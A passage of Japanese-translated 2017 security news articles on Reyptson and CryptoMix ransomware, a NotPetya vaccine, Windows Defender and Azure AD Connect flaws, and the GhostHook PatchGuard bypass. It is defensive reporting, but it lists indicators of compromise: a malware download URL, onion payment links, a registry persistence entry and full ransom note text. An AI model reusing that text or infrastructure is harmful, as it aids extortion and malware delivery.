     ファイルを暗号化している時、この身代金要求型マルウェアは、暗号化したファイルに .Reyptson 拡張子を追加する。例えば、test.pngと名付けられていたファイルは、暗号化されると test.png.Reyptson にリネームされる。


    Reyptsonに暗号化されたファイルのフォルダ(画像をクリックすると拡大します)

     ファイルを暗号化している時、この身代金要求型マルウェアまた、暗号化されたファイルの存在する夫々のフォルダにComo_Recuperar_Tus_Ficheros.txtと名付けた脅迫文を作成する。


    脅迫文(画像をクリックすると拡大します)

     不当なメッセジを表示するために、この身代金要求型マルウェアはPDFリーダを起動し、インチキのPDFファイルを開く。これは、犠牲者が開いたファイルがPDFであったということを、犠牲者により確信をさせるためである。
     その直後に、この身代金要求型マルウェアは、%AppData%\Spotify\SpotifyWebHelper\SpotifyWebHelper.exe を起動する。これは、支払いサーバへのアクセス方法をに関する情報を含むロックスクリーン/脅迫文を表示する。


    Reyptsonロック画面(画像をクリックすると拡大します)

    Reyptson支払いサーバ

     脅迫文もロック画面も、犠牲者が支払い指示を得るためにログインしなければならないTor支払いサーバへのリンクを含んでいる。当初、身代金額は 200ユーロ(25875円)に設定されており、72時間後には 500ユーロ(64680円)に増加する。身代金をBitcoinではなく現実の貨幣で要求することは、犠牲者を混乱させるだけになるので、新人の行為である。


    支払いサイト その1(画像をクリックすると拡大します)


    支払いサイト その2(画像をクリックすると拡大します)

     犠牲者のログインページの下部に、犠牲者が、この身代金要求型マルウェア開発者とコミュニケーションを採ることを可能にするサポートフォームも存在している。この機能が現在動作するか否かは不明である。
     既に述べたように、この時点でReyptsonによって暗号化されたファイルを復号する方法はないが、この身代金要求型マルウェアでの支援を必要とするのであれば、あなたは、我々のReyptson Support & Help Topicで尋ねることができる。

    IOCs

    ハッシュ:
    SHA256: e6d549543863cd3eb7d92436739a66da4b2cc1a9d40267c4bb2b2fa50bf42f41

    ネットワーク コミュニケーション
    http://www.melvinmusicals.com/facefiles/
    http://37z2akkbd3vqphw5.onion/?usuario=[user_id]&pass=[password]
    http://37z2akkbd3vqphw5.onion.link/?usuario=[user_id]&pass=[password]

    Reyptson身代金要求型マルウェア関連ファイル
    %AppData%\Spotify\
    %AppData%\Spotify\SpotifyWebHelper\
    %AppData%\Spotify\SpotifyWebHelper\dat
    %AppData%\Spotify\SpotifyWebHelper\fin
    %AppData%\Spotify\SpotifyWebHelper\Reyptson.pdf
    %AppData%\Spotify\SpotifyWebHelper\Spotify.vbs
    %AppData%\Spotify\SpotifyWebHelper\SpotifyWebHelper.exe
    Registry Entries associated with the Reyptson Ransomware:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Spotify Web Helper v1.0      %AppData%\Spotify\SpotifyWebHelper\Spotify.vbs


    新たなExte CryptoMix身代金要求型マルウェアの変種がリリースされた
    BleepingComputer : News>Security (2017/07/14)
     昨日、Malwarebytesのマルウェア研究者Marcelo Riveroは、暗号化したファイル名に .EXTE を追加するCryptoMix身代金要求型マルウェアの新しい変種を発見した。この記事は、この新しい変種に関連する情報の概要を簡潔に提供するものである。
     我々は常に弱点を探しているので、あなたが、この変種の犠牲者であり、身代金を支払うことを決定したのであれば、我々が、どうか、この復号プログラムを我々に送って欲しい、そこで我々は、その復号プログラムを調査することができる。あなた方はまた、我々の専用のCryptomix Help & Support Topicで、CryptoMix身代金要求型マルウェア感染に関する論議やサポートを受けることができる。

    Exte CryptoMix身代金要求型マルウェア変種での変更点

     全体的な暗号化方法は、この変種でも同じであるが、幾つかの相違がある。何よりもまず、_HELP_INSTRUCTION.TXTと名付けられたファイルでの新しい脅迫文がある。この脅迫文は、支払い情報に関してexte1@msgden.net, exte2@protonmail.com, もしくは exte3@reddithub.com の何れかに接触するように指示している。


    Exteの脅迫文

     次の際立った変更は、暗号化されたファイルに追加される拡張子である。この変種では、ファイルが暗号化されると、ファイル名が改竄され、暗号化されたファイルには、.EXTE 拡張子が追加される。例えば、この変種によって暗号化されたテスト ファイルは、32A1CD301F2322B032AA8C8625EC0768.EXTEの名前になった。


    暗号化されたExteファイルのフォルダ

     興味ある点の一つは、この変種が、以前のAZER種と同様に、同じ10個の公開RSA鍵の使用を継続していることである。これらの鍵の一つは、犠牲者のファイルを暗号化するために使用されたAES鍵を暗号化するために選択されるだろう。これは、この身代金要求型マルウェアがネットワーク コミニケーションのない完全なオフラインで動作することを可能にしている。
     これは、この新しい変種の大雑把な解析に過ぎないので、他に何かが発見された場合には、我々は、この記事を必ずアップデートするだろう。

    IOCs

    ファイル ハッシュ: SHA256:
    6211fdd680208f94aa0149619facc0de8b51e6cb98108132d539469f3affa712
    Exte CryptoMix変種に関連したファイル名:
    _HELP_INSTRUCTION.TXT
    %AppData%\[random].exe
    Exte脅迫文:
    Hello!
    Attention! All Your data was encrypted!
    For specific informartion, please send us an email with Your ID number:
    exte1@msgden.net
    exte2@protonmail.com
    exte3@reddithub.com
    We will help You as soon as possible!
    DECRYPT-ID-[victim_id] number
    Exte身代金要求型マルウェアに関連したeMailアドレス:
    exte1@msgden.net
    exte2@protonmail.com
    exte3@reddithub.com
    同梱されている公開RSA-1024鍵:
    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfBni3t7uANs2aVmoh33h/gUlA
    UMlLAIYgjIQx0cdategi5Gs6SubFxGLoJgjR1TkYXnhB9UxlKCqsAaKSAegQMLRM 7HN/h6eZN7PaLMfFf/
    aJgZJe0FuaV/CABEvGopt5VqR3GJLzhgl/qttgsCTQcPFC G4gRBgdJ0Uqdq6Pe1wIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTp02+iahQUVQQSGTYcAgUdyn8 R6D3+q/
    M1GwA4c6ePwXlsEJC8UC4hDE4otjs4Vae0MauQrvkYo2rnilCpiqsv0Oo
    OjDgOHhHI1vUILpWjAVRu61DORWqdvQEH3x9GfGRIulKwhVdzll5sGS9pyGWAAGq XvJ8T/ods5V
    +M3nFvQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2Zs4/PG+bhEhduEnmB/zS4Ps7
    bD0EDn6q2tgpIwu7WF4NhDwnCQYeX9uweOs+x3pPKIHgZj7KtyOdwjJEMYt4yago
    kMnp24CM413CbGz28tsSLifJpcDq7NdFlItv1foqE3EhxK4RnnsKRnlNnZOmJobj
    BXWAK7kI6PMjAsycjQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdcVWIUztGfqsyayX8MJ+MilwA OCMmaedwUkhcrOaZbEr/
    kjFAS/51dhxfUmoO2M6N51D1+Tlx1hFP0Bbea41ory14 /jXmBP/
    ARTPejT9wmAcdFSYL5RKqn21imymnSfllV7lLSS7fwzIhUibz/c13pk1w UFQpsQKlAmge6nPWMQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCoXHPF5pGepB37MwkGshTi4N+q
    KaRbRAk6b6tDUxHK8AWyNDJTFKLygvaNTxjAcpY467SDTXQq6EyvaCh2juaSzCLH
    qxcwIVRMH4mtBI8RKx5bycWssbuZD6XwQpcS7WABqE8+BuYDmALgeh1W0UVBQge5
    Alv8dKw5oY2B84RApQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfshy8WocDLQBfn36LclXu7obD
    X5hCJFAKntVU3Siyy6XKnumyu/qsiwekxG0QkDrEuWZWGk+/w5qVf+bw1wXbKnBr
    h2FiYqtXgN8pX7h6vDhYNWd80RKg0fxA7sRYoB7HCtel99BCcGOKvWbsr9hcFq3j
    EPtf81OdtqlTI6x6uwIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3ncKb3ppnuXs7NtizXtdHcKcj
    sfSIhS3E23j5Z4pxYfj3c3ipP8/gxu93/9b6qSQnQ87NRACf8NBbpr1XYR1kGkNK cRk
    +u1QsKsVyYP8QoMtnCPbxaIAxZ9qc2o8eFPt44IbOFNo4TS682ZnrgvCIl/D+ taf9I8jbrBTSbfxQ3wIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNdG6Kp5B6EHKVsENf2QudkLfe
    TMzETNDGBk5cvGpj3On70vZGODVj/WfRe2iHyVE0ykT/iXXtb/C5gw3FePCSGVja
    5S3qH9xh6Ncw5sFrsdgBbm7qPYSbRmux2VTjHlLE44ckkTTCSiTUL3KX/08cU04V hb/
    JtNwKF5bg3ycuhQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqqapIMkQJgyt8mfVLZRPIEU20 V8c3
    +JbWNCdtDrIucv5nsKxJ/hCCDCau8gVjNN5jWtLltoQ0NvwR94HZaUkXAjGq Iy+vvpc66SBLin8pJ/
    DzLtA3ouQBrYU2/9C75DrKGuCedEoAzoFkCjz/AokqjTkz xSIkf+5//Rpoj22lHwIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHZ0EKaGTzyOxqaX2ePqAs46RU
    HhLRsApVWfO0z3BADXv4cv2iGjSXRZE1g7dU/KNEVZrjuBRaHksWpXKIwI6v7vSJ ZcxsaNRZNS
    +RTwJbu5VNc5uHBc5YPa7sdqocVrt3b6eXXPbn5gZcQY3L18TTd+S3 DljCC6h8BC80BJI6OQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCkrR8CoTgor4sIybnVarCSWzMN
    RIoH51qIgCWDx49UQYXXqCn7I4T2XL7iOD5Fb/LO8LLS/BC7xNETIBGwUsOLMUXq
    0LT3wlASZX4l491JPAAzlGfspmWqOnxwFZh4e2kqbix9uTGRw7oC0v7n6pACJSLW
    ybODvrXAfJlITYUYIQIDAQAB
    -----END PUBLIC KEY-----


    Mole02 CryptoMix身代金要求型マルウェア変種用の復号プログラムがリリースされた
    BleepingComputer : News>Security (2017/07/05)
     身代金要求型マルウェアでファイルを暗号化された犠牲者に対して無料の復号プログラムをアナウンスできることは常に大変喜ばしいことである。本日の場合は、Mole02 CryptoMix身代金要求型マルウェア変種用の復号プログラムのリリースである。この復号プログラムは、Secarma Threat IntelチームのCharley Celiceの支援でSTIGroup, Ltdのセキュリティ研究者M AVによって作成された。
     この復号プログラムを使用するには、Mole02種の犠牲者は、無料でファイルを復元することが可能である。この復号プログラムの使い方に関する説明は、以下に見出すことができる。この復号プログラムの使い方をサポートしてもらう必要のある者は、Mole02/CryptoMix Help and Support Topicで質問しなさい。

    Mole復号プログラムを使用して.Mole02 に暗号化されたファイルを復号する方法

     Mole02 CryptoMix身代金要求型マルウェア種の犠牲者は、暗号化されたファイルが、[変更されたファイル名].MOLE02のフォーマットにリネームされていることで特定される。例えば、暗号化されたファイルは、26E14BA00B70A5D0AE4EBAD33D3416B0.MOLE02 のような名前になっている。暗号化されたファイルのフォルダの例は、以下のようになる。


    .Mole02に暗号化されたファイル(クリックすると拡大します)

     この復号プログラムの使い方は大変簡単である。プログラムをダウンロードし、それを実行すると、ファイルを復号するためにドライブのスキャンが始まる。
     最初のステップは、以下のリンクからMole02復号プログラムをダウンロードすることである。ダウンロードしたら、パスワードfalsepositiveを使用して解凍し、このプログラムを実行する。

    MOLE02復号プログラム ダウンロード

     実行すると以下に示す画面が表示される。


    .Mole02復号プログラム(クリックすると拡大します)

     このプログラムが実行されている間、このプログラムが何をしているかというような一切の指示は表示されない。このプログラムが終了し、あなたのファイルが復号されるまで(私のテストでは以下)放置しなさい。


    復号されたファイルのフォルダ(クリックすると拡大します)

     これでファイルは復号されたので、あなたはコンピュータからこの復号プログラムを削除することができる。この復号プログラムに関して何らかの質問があるのなら、Mole02/CryptoMix Help and Support Topicで遠慮無く質問しなさい。


    大流行しているPetya(NotPetya)身代金要求型マルウェアに対するワクチン(キルスイッチではない)が発見された
    BleepingComputer : News>Security (2017/06/27)
     Cybereasonのセキュリティ研究者Amit Serperが、Petya(NotPetya/SortaPetya/Petna)身代金要求型マルウェアによるコンピュータ感染を防御する方法を発見した。
     この身代金要求型マルウェアは、ハードドライブのMFTやMBRセクションをロックし、コンピュータをブートできないようにして、今日世界に大災害をもたらしている。犠牲者は、身代金の支払いを選択した(もはや無意味であり、推奨されない)場合を除いて、彼等のシステムを復元する方法は存在していなかった。


    NotPetya身代金要求画面(クリックすると拡大します)

     この攻撃が始まってから数時間のうちは、研究者は、この新しい身代金要求型マルウェアが、古い脅威であるPetyaの新しいバージョンであると確信していたが、その後、この身代金要求型マルウェアが、完全に新種の株であることを発見した。この新たな身代金要求型マルウェアは、Petyaからコードの一部を借りていることが、NotPetya, Petna(我々は、SortaPetyaと呼びたいと思う)と最近呼ばれるようになった理由である。

    研究者達は群がってKillswitchメカニズムを発見しようとした

     この身代金要求型マルウェアの拡散が全世界的であったために、多くの研究者が、暗号化の穴や、WannaCryのような、拡散を停止させるであろうキルスイッチ(無効化措置)ドメインを発見することを期待して、このマルウェアの解析に群がった。
     この身代金要求型マルウェアの内部動作を解析している間に、Serperは、NotPetyaがローカルファイルを検索し、そのファイルが既にディスク上に存在していたなら、暗号化のルーチンを実行していることを最初に発見した。
     この研究者の初期の所見は、PT Security, TrustedSec, Emsisoftのような、他のセキュリティ研究者によって、追認された。
     これは、犠牲者が、彼等のPCにそのファイルを作成し、そのファイルを読み込み専用に設定することで、NotPetya身代金要求型マルウェアの実行を防止できることを意味している。
     これは、この身代金要求型マルウェアが実行することを防止するので、この方法は、キルスイッチ(無効化措置)ではなく予防接種である。これが、各コンピュータユーザが、個々にこのファイルを作成しなければならない理由である。グローバルな全ての身代金要求型マルウェア感染を防止するために、この身代金要求型マルウェアの開発者がONにできた「スイッチ」と比べなさい。

    NotPetya/Petna/Petya ワクチンを有効にするには

     あなたのコンピュータにワクチン接種は、あなたが、NotPetya/Petna/Petyaの現在の株に感染していた場合は不可能である。C:\Windows フォルダ中に perfc と名付けたファイルを作成し、このファイルを読み込み専用に設定しなさい。このタスクを実行する簡単な方法を望む人のために、Lawrence Abramsは、あなたに代わって、このステップを実行するバッチファイルを作成している。
     彼のバッチファイルは、perfc.dat と perfc.dll と名付けられた、二つの追加のワクチンも作成することに注意しなさい。私のテストでは、これらの追加のファイルを必要とはされなかったが、私は、このTweetへの返答に基づき、万全を期して、それらを追加した。
     このバッチファイルは、https://download.bleepingcomputer.com/bats/nopetyavac.bat に見出すことができる。
     コンピュータを手動で予防接種したい人に関しては、以下のステップを使用して実行することができる。これらのステップは、あまりコンピュータの経験がない人でもできるように、分り易く作成されていることに留意しなさい。経験豊かな人々に関しては、幾つかの、そして、多分より適切な方法で、これを実行することができる。
     最初に、ファイルの拡張子を表示するようにWindowsを設定する。この実行方法を知らない人に関しては、コチラのガイドを使用しなさい。フォルダ オプション設定で「登録されていない拡張子は表示しない」がチェックされていないことを確認しなさい。


    フォルダ オプション(原文は英語バージョンの画像ですが、Microsoft日本語サイトの画像に変更しています)

     拡張子の表示を有効にしたら(これは常に有効にしておくべきである)、C:\Windows フォルダを開きく。フォルダが開いたら、Notepad.exeプログラムが表示されるまでスクロールダウンする。


    Windowsフォルダ

     notepad.exeプログラムを見つけたら、その上を左クリックし、強調表示にする。[Ctrl]+[C]でコピーし、[Ctrl]+[V]で、これをペーストする。ペーストすると、ファイルをコピーするパーミッションの許諾を求めるプロンプトが表示される。


    パーミッションの許諾メッセージボックスは、日本語バージョンでは、以下の内容で表示される。
    タイトル: 対象のフォルダへのアクセスは拒否されました
    本文: このフォルダへ移動するには管理者のアクセス許可を提供する必要があります

     「続行」ボタンを押すと、このファイルは、notepad-Copy.exeとして作成される。このファイルを左クリックし、次に、キーボードの[F2]キーを押す。これで、notepad-Copy.exeのファイル名の変更ができるようになるので、以下の図に示したように、perfc とタイプする。


    ファイル名の変更

     このファイル名を perfc に変更したら、キーボードの[Enter]を押す。あなたは、このファイルの名前を変更したいのか否かを尋ねるプロンプトが表示される。

     「Yes(はい)」ボタンをクリックする。Windowsは再び、このフォルダのファイルの名前を変更するための許可を求めてくる。「継続」ボタンをクリックする。
     これで、perfcファイルが作成されたので、このファイルをRead Only(読み込み専用)に設定する必要がある。これを実行するには、perfcファイルを右クリックし、図に示したようにプロパティを選択する。


    一番下のProperties(プロパティ)を選択する

     このフォルダのプロパティ メニューが開く。一番下に、「読み取り専用」とラベルされたチェックボックスがある。以下の画像のように、このチェックボックスにチェックをいれる。


    読み取り専用属性の指定

     ここで、「適用」ボタンをクリックし、次に「OK」ボタンをクリックする。これで、プロパティウィンドウが閉じる。私のテストでは、私のコンピュータを予防接種するために必要な全てであったが、万全を期すために、同様に、C:\Windows\perfc.dat と C:\Windows\perfc.dll を作成することが提案されている。
     あなたのコンピュータは、これでNotPetya/SortaPetya/Petya身代金要求型マルウェアに対して予防接種された。


    Microsftは、Azure AD Connectに関する「重要な」セキュリティアップデートを発行した
    Kaspersky : ThreatPost (2017/06/28)
     Microsoftは、Azure Active Directory Connect製品のバグを顧客に警告している。このバグは、敵対者が権限の昇格を行い、パスワードをリセットし、ユーザのアカウントへの不正アクセスを取得することを可能にするものである。
     アドバイザリ(4033453)は、「重要」と評価される脆弱性としてMicrosoftのTechNet Webサイトに火曜日リリースされた。このアドバイザリは、この脆弱性に対する組織への影響の有無を決定する方法を含んでいる。問題の修正は、最新バージョンのAzure AD Connect(1.1.553.0)にアップグレードする方法を含んでいる。
     Azure Active Directory Connectは、Microsoftのツールであり、ローカル(オンプレミス)Active Directoryとクラウド ベースのAzure Active Directory(Azure AD)間のネットワーク同期の状態をモニタリングするためのものである。
     このアドバイザリによると、(【訳注】 以下「」内、Microsoft TechNetの原文のまま)「この更新プログラムは、Azure AD Connect のパスワード ライトバックを有効化する際に正しく構成されなかった場合に特権が昇格される脆弱性を解決します」とし、「攻撃者がこの脆弱性を悪用した場合、パスワードをリセットし、任意のオンプレミス AD の特権ユーザー アカウントに不正にアクセスする可能性があります」としている。
     Microsoftは、パスワードのライトバック機能は、Azure AD Connectのコンポーネントであると説明している。これを使用して、ユーザは、彼等のパスワードをオンプレミス AD ユーザ アカウントにパスワードを書き戻すように、Azure ADを構築することを可能になる。「オンプレミス AD 管理者が意図せずオンプレミス AD の特権アカウントに対してもパスワード リセット権限 (エンタープライズ管理者およびドメイン管理者のアカウントを含む) を Azure AD Connect に付与する可能性があります」と、このアドバイザリは記述している。
     このリスクは、悪意のある Azure AD 管理者が、パスワード ライトバックを利用して、任意のオンプレミス AD の特権ユーザー アカウントのパスワードを既知のパスワード値に書き換えた場合に存在する。これは、悪意のあるAzure AD管理者が顧客のオンプレミスActive Directoryへの特権の取得に導く可能性があると、Microsoftは発言している。
     この脆弱性に対する影響の検証は、パスワード ライトバックが有効化されているか否かを確認し、あなたのAzure AD Connectサーバにオンプレミス AD 権限アカウントに対するパスワードのリセット権限が付与されているか否かの評価を含んでいる。
     このアドバイザリによると、「AD DSアカウントが、一つまたは複数のオンプレミスADの特権グループのメンバーの場合、グループから、そのAD DSアカウントを削除することを検討してください」としている。このアドバイザリは、ステップを大変詳細に述べているが、この脆弱性を修正するには、Azure AD Connectの最新版にアップデートすることを推奨している。
     Azure AD Connectの脆弱性は、CVE同定子CVE-2017-8613が割り当てられている。


    MicrosoftはコッソリWindows Defender中のセキュリティホールを塞いでいた
    BleepingComputer : News>Security (2017/06/27)

     金曜日、Microsoftは、Microsoft Malware Protection Engine (MsMpEng、Microsoftエコシステム セキュリティサービスの中核)中の重大なセキュリティフローをパッチする緊急のアップデートをリリースしていた。
     CVE-2017-8558として追跡されるこのバグは、このMalware Protection Engineに含まれるx86エミュレータに影響を与えるものであり、Google Project Zeroの研究者Tavis Ormandyによって発見されていた。
     Ormandyの技術的詳細によると、この脆弱性は、攻撃者がユーザのコンピュータでコードを実行し、ローカルシステム権限を取得し、犠牲者のPCを制御することを可能にするものである。

    悪用はバカバカしいほど簡単

     このフローを悪用することは、攻撃者が様々な方法(eMail、チャット メッセージ、ファイルのダウンロード、もしくは、犠牲者を欺いて兵器化したJSファイルをホストしている悪意あるWebサイトにアクセスさせる)で不正な形式のファイルを犠牲者に送信することを要求するだけなので、バカバカしいほど簡単である。
     MsMpEngは、ユーザのPCに新しいコンテンツが到着すると直ちにスキャンするので、攻撃者は、ユーザとの対話的操作を必要とせずに、ターゲットのシステムを即座に掌握することができるだろう。
     これは、このMalware Protection Engineが、Windows 7 以降の全てのWindows OSバージョンに組み込みのサービスとして出荷されているために、そして、Windows Defender, Microsoft Security Essentials, Microsoft Endpoint Protection, Windows Intune Endpoint Protection, Microsoft Forefront Endpoint Protectionのような一連のMicrosoftのセキュリティ製品のコア コンポーネントであるために大きな問題である。このバグは、攻撃者がこれらのセキュリティ製品をクラッシュさせたりバイパスすることを可能にするだろう。
     アドバイザリで、Microsoftは、上述の製品の全てが、この問題の影響を受けると発言している。Microsoftは、Malware Protection Engineのバージョンを 1.1.13903.0 にコッソリとアップデートすることでこの脆弱性をパッチした。
     ユーザがアップデート管理ソフトウェアを介して、特にアップデートをブロックしている場合を除いて、Microsoft Malware Protection Engineは、ユーザとの対話を必要とせずに、それ自体をコッソリとアップデートしている。

    PoC(proof-of-concept、概念の実証)は、大変危険なので暗号化される必要があった

     Ormandyは、Microsoftの従業員のために、このフローをデモするproof-of-conceptファイルを組み立てた。当に、このバグが如何に危険であり、如何に悪用することが簡単なのかを示しているために、Ormandyは、Microsoftに、このPoCデモを送信するにあたり、このPoCがMicrosoftのシステムに到着した瞬間に、MicrosoftのeMailサーバをクラッシュさせる危険があったために、このPoCデモを暗号化した。
     これは、Ormandyが、PoCデモを暗号化した二回目のことである。5月初旬、Ormandyは、「大変酷いバグ」であり、「最近の記憶では、最悪のWindowsリモートコード実行」として説明した類似のバグを発見している。
     三週間後、彼の同僚の一人はまた、同じMsMpEngコンポーネントに影響を与える一連の問題を発見した。

    バグは数百万ドルの価値があっただろう

     これらのバグは全て、攻撃者にセキュリティサービスをクラッシュさせたりバイパスしたりすることが可能であり、ユーザのシステムを乗っ取ることが可能であるために、危険なものである。このようなことを実行できるリリースが、ハッキング フォーラムで売られたなら、地球上の全てのWindowsコンピュータにコッソリ侵入することが可能になるので、悪事の張本人は数百万ドルを手にしていただろう。
     Ormandyは、ファジング(ランダムなデータを取り出し、そのデータをプログラムのインプットに与えることで、ソフトウェアがどのように振る舞い、バグを吐き出すのかをテストすること)と呼ばれるテクニックを使用して、このバグを発見したと発言している。
     この冬の間ずっと、Ormandyは、Windows Defenderのバグをテストをするために、Linuxベースのファジングを使用できるように、Windows DefenderのDLLをLinuxに移植するためのツールを構築していた。彼は、特にWindows Defenderのバグをテストするためにこのツールを組み立てたと発言している。明らかに、このツールは動作し、Microsoft独自のファジングが捕獲できなかった問題を露出させた。


    CPUをクラッシュさせるIntelのバグに関して未だWindowsは修正を出していない
    BleepingComputer : News>Security (2017/06/27)
     一部のIntel CPUモデルは、一定の順序に従って操作が処理されている時に、コンピュータをクラッシュさせるバグの影響を受ける。
     このバグは、OCamlコンパイラに取り組んでいる開発者によって発見され、昨年Intelに通知された。Intelは、2017年の4月と5月にマイクロコード エラッタ(正誤表)の形式で、この問題に関する修正をロールアウトした。
     Intelは、Kaby Lake, Skylake, Xeon v5, Xeon v6, 一部のPentium と Core Xシリーズ v6 モデルが影響を受けると発言している。
     Intelは、この問題は「予想不能なシステム挙動を発生させるかもしれない」と発言し、Debian開発者は、このバグが「アプリケーションやシステムの不正な挙動、データ損壊、データ損失のような、不適切なエラーを発生させることができた」と、セキュリティアドバイザリで発言している。
     Linuxコンピュータの一部のベンダは、このIntel問題の修正を実装したBIOS/UEFIアップデートを既に出荷している。他方、Windows Updateでバグフィックスの兆候は未だに存在していない。
     その一方で、エキスパートは、ユーザにBIOSもしくはUEFI設定でhyper-threading(【訳注】 マイクロプロセッサの高速化技術(IT用語辞典より))を無効化するように推奨している。この方法は、CPUパフォーマンスを犠牲にしてバグを緩和する。
     IntelベースのPCに影響を与える不思議なクラッシュの相次ぐ報告は存在していないので、このバグは、記述している時点では、大きな問題になりそうにないが、ユーザは、高感度システへの重要なクラッシュを防止するために必須のステップの全てを取る必要がある。


    新たなGhostHook攻撃は、Windows PatchGuard防御をバイパスする
    BleepingComputer : News>Security (2017/06/22)
     セキュリティ専門家は、Windows PatchGuard防御をバイパスし、悪意あるコードをWindowsカーネルにフックする方法を発見した。これは、今まで難攻不落と考えられていたシステムに攻撃者がルートキットを仕掛けることを可能にする。
     PatchGuard(Kernel Patch Protection (KPP)の公式名で知られている)は、サポートされない方法でサードパーティーのコードをWindowsカーネルにパッチすることを妨げるためのWindows 64-bitエディションのセキュリティ機能である。
     Microsoftは2005年(Windows XPに端を発する)にPatchGuardを導入した。そして、この機能は、殆どのルートキットが64-bit Editionで動作することを妨げた。

    GhostHook攻撃は、Intel PT機能を悪用している

     本日、CyberArkのセキュリティ研究者達は、Intel CPUの機能を使用してPatchGuardを首尾よくバイパスするGhostHookと名付けた新しいテクニックに関する研究を公開した。
     研究者達によると、GhostHookは、Intel Processor Trace(デバッグ操作や悪意あるコードの検出を支援する目的で、現在のソフトウェア実行についての情報を捕獲するために専用のハードウェアを使用する)が稼働しているシステムに対してのみ動作する。
     通常、Intel PTオペレーションへの侵入は、PatchGuardが即座に検出しブロックする操作であるところの悪意ある機能をカーネルレベルのコード中にパッチすることを攻撃者に要求する。
     CyberArkの研究者達は、Intel PTのプロセス用に極端に小さなバッファを割り当て、そのCPU中では、パケットは、バッファスペースから逸脱するので、オーバーフローしているコードを管理するためにPMIハンドラが起動されることを発見したと発言している。
     この問題は、PatchGuardがPMIハンドラを監視していないことであり、攻撃者が、そのPMIハンドラを介してカーネル オペレーションにパッチするために彼の悪意あるコードを追加できるということである。
     これは、Windowsカーネルをパッチし、Windows 64-bitバージョンにルートキットを埋め込む非検出の方法を攻撃者に提供するものである。GhostHookは、Windows 10(2015年の夏にスタートして以来、ほんの2〜3のルートキット以外は、効果的ではないことが証明されてきた)でも動作する。

    MicrosoftはGhostHook攻撃ベクトルをパッチすることはない

     CyberArkは、GhostHook攻撃についてMicrosoftにコンタクトしたが、セキュリティ アップデートのリリースは拒否されたと発言している。Microsoftは、定例のバグフィックス サイクルで、この問題をパッチするかもしれないが、GhostHookは、セキュリティ フローとして脅威ではないだろうと発言している。
     Microsoftは、GhostHook攻撃を実行するには、攻撃者が感染したマシンでカーネルレベルのアクセスを持つ必要があると発言することで彼等の決定を正当化した。カーネルレベルの権限を持つ攻撃者は、他の多くの悪意ある行動を実行することができるので、ユーザは、まず第一に、この高水準のアクセスを取得することから、攻撃者を妨げることに集中する必要がある。
     この攻撃ベクトルへのパッチをMicrosoftが拒否したことに対応して、CyberArkは、この問題は、必ずしも攻撃者のアクセスレベルにあるわけではなく、64-bit Windowsバージョンにルートキットのためのドアを開く「PatchGuardのバイパス」であると繰り返し発言している。
     現実の問題は、攻撃者が、ここ数年アクセスしていなかったプラットフォームに、ルートキットを埋め込むために彼等のテクニックを自由に使うことができるということである。
     現在、64-bitマルウェアは、マルウェア全体の1%に満たない。そして、PatchGuardは、64-bitバージョンを安全に保持し、感染を困難にしている一つの理由である。GhostHook攻撃の技術的な説明は、コチラを参照されたい。

    McAfeeが、プロキシとしてPCを使用するPinkslipbot残存物を削除する無料ツールをリリースした
    BleepingComputer : News>Security : News (2017/06/20)
     先週、McAfeeは、AmIPinkC2と名付けたツールをリリースした。このツールは、オリジナルのPinkslipbotのバイナリが感染したホストからクリーンにされ削除された場合でさえ、このマルウェアが、プロキシ リレーとして感染したコンピューターを使用し続けることを可能にするPinkslipbot感染の残存ファイルを削除するWindowsコマンドライン アプリケーションである。
     問題になっているマルウェアは、2007年に出現し、三つの別名(Qakbot, Qbot, PinkSlip)で追跡されているPinkslipbotである。

    Pinkslipbotは広く知られた深刻な脅威である

    Pinkslipbotは、マルウェアの状況に於いて、主に特定のターゲットを定めていることで広く知られた脅威である。この著者は、レギュラーユーザを追い求めていないが、歴史的に北米企業、とりわけ、コーポレートバンキング、金融機関、トレジャリーサービス等のような儲かる産業をターゲットにしていた。
     このバンキング・トロイは常にアクティブなわけではなく、大変巧みに計画されたキャンペーンの一部として周期的に回帰してくる。過去数年に於いて、多くのサイバーセキュリティ企業が、その攻撃を追跡し、様々なバージョン[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]を潰してきた。
     つい最近のキャンペーンは、感染したコンピュータのActive Directory(【訳注】 マイクロソフトによって開発されたディレクトリ・サービス・システムであり、Windows 2000 Serverから導入された、ユーザとコンピュータリソースを管理するコンポーネント群の総称(Wikipediaより))をロックアウトするPinkslipbotの亜種に気がついたIBMのセキュリティ研究者によって発見された。

    McAfeeはPinkslipbot感染中に新しい欠点を発見した

     歴史的にPinkslipbotキャンペーンを追跡してきた企業の一つがMcAfeeである。この研究者達は、昨年のVirus Bulletinセキュリティ カンファレンスで、このトロイのC&Cサーバの基盤構造の解析と、そのC&Cコミュニケーションの方法をを提示した。
     先週、過去と現在のPinkslipbotキャンペーンを検証している間に、研究者達は、このトロイの操作モード中に新しい欠点を発見した
